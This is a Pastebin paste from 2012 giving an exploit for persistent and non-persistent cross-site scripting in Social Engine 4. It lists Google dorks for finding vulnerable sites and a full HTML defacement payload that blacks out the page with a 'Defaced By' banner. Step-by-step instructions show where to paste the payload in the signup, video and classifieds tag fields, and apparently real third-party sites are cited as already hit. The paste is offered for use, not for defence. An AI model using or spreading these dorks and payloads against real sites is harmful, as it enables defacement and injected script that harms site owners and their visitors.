API tools faq
paste
Advertisement
x-cisadane

Social Engine 4 Persistent XSS & Non-Persistent XSS

x-cisadane
Jul 26th, 2012
198
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.77 KB | None | 0 0
raw download clone embed print report
  1. =====================================================
  2. Social Engine 4 Persistent XSS & Non-Persistent XSS
  3. =====================================================
  4.  
  5. :------------------------------------------------------------------------------------------
  6.  
  7. ----------------------------------------------:
  8. : # Exploit Title : Social Engine 4 Persistent XSS & Non-Persistent XSS
  9. : # Date : 27 July 2012
  10. : # Author : X-Cisadane
  11. : # Software Link : http://www.socialengine.com/buy-social-engine
  12. : # Version : ALL
  13. : # Category : Web Applications
  14. : # Vulnerability : Persistent & Non-Persistent XSS
  15. : # Tested On : Mozilla Firefox 7.0.1 (Windows)
  16. : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta
  17.  
  18. Anonymous Club, Winda Utari
  19. :------------------------------------------------------------------------------------------
  20.  
  21. ----------------------------------------------:
  22. DORKS
  23. =====
  24. "This will be the end of your profile link, for example:"
  25. OR
  26. intext:"This page will contain the privacy statement of your choice."
  27.  
  28.  
  29. XSS CODE
  30. =======
  31. <DIV align=left>
  32. <DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; 1; LEFT: 1px;
  33.  
  34. BORDER-LEFT: #000000 1px; WIDTH: 1500px; BORDER-BOTTOM: #000000 1px; POSITION: absolute;
  35.  
  36. TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000">
  37. <br /><br />
  38. <br>
  39. <center>
  40. <font face="Arial" color="red" size="4"><strong><br><br><br>Defaced By : X-Cisadane
  41. <br>
  42. </center>
  43. <font face="Courier New" color="#FF0000" size="3"><center>Greetz To : X-Code, Borneo Crew,
  44.  
  45. Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Winda
  46.  
  47. Utari</center></font>
  48. <center><img
  49.  
  50. src="http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif"></img></center>
  51. <center><font face="arial" size="3" color="#FF0000">
  52. <marquee behavior="alternate" scrolldelay="100" style="width: 90%">Please fix your hole!
  53. </li>
  54. </ul>
  55. </td>
  56. </tr>
  57. </table>
  58. </div>
  59.  
  60. Proof of Concept
  61. ================
  62. 1. Non-Persistent XSS on Sign Up Page
  63. Example : http://SITE TARGET/signup
  64. Copy & Paste XSS Code into Profile Address Field
  65. Pic : http://i45.tinypic.com/v46iyd.png
  66. Pic : http://i49.tinypic.com/156e79h.png
  67.  
  68. 2. Persistent XSS on Tags (Keywords) Field
  69. - In the Post New Video Page (http://SITE TARGET/videos/create)
  70. Copy & Paste XSS Code into Tags (keywords) Field
  71. Picture : http://i50.tinypic.com/14soaci.png
  72. Example : http://www.ankabooot.com/videos/11081/523
  73.  
  74. - In the Post New Classfields Listing Page (http://SITE TARGET/classifieds/create)
  75. Copy & Paste XSS Code into Tags (keywords) Field
  76. Picture : http://i47.tinypic.com/2ptcv29.png
  77. Example : http://www.contact.me/index.php/classifieds/27205/4/test
  78.  
  79. All XSS Flaws tested with Mozilla Firefox 7.0.1 (Windows)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!